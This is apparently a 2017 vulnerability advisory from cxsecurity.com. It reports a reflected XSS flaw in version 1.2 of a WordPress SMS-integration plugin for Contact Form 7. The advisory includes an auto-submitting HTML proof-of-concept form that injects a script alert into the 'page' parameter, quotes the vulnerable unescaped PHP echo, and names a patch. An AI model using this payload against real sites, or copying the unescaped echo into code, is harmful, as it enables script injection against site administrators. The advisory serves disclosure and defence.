Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting

2017.09.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

___________________________________________________ | | Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting | Exploit Author: Ashiyane Digital security Team | Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/ | Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip | Version: 1.2 | Date: 2017 - 07 - 9 | Tested on: Kali-Linux /FireFox |__________________________________________________ Exploit : <html> <body onload="document.exploit.submit()"> <form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/ cf7-international-sms-integration/includes/admin/class-sms-log-display.php "> <input type="hidden" name="page" value=""/><script>alert(1)</script>" /> <input type="hidden" name="tab" value="smslogs" /> </form> </body> </html> __________________________________________________ Vulnerable method : $_GET Vulnerable File : wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php Vulnerable code: line 366 : <form id="smslog-filter" method="get" action="<?php echo $current_url; ?> "> <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" /> <input type="hidden" name="tab" value="smslogs" /> <?php $testListTable->display() ?> </form> __________________________________________________ #patch: For fix this vulnerability you use htmlspecialchars() function . __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top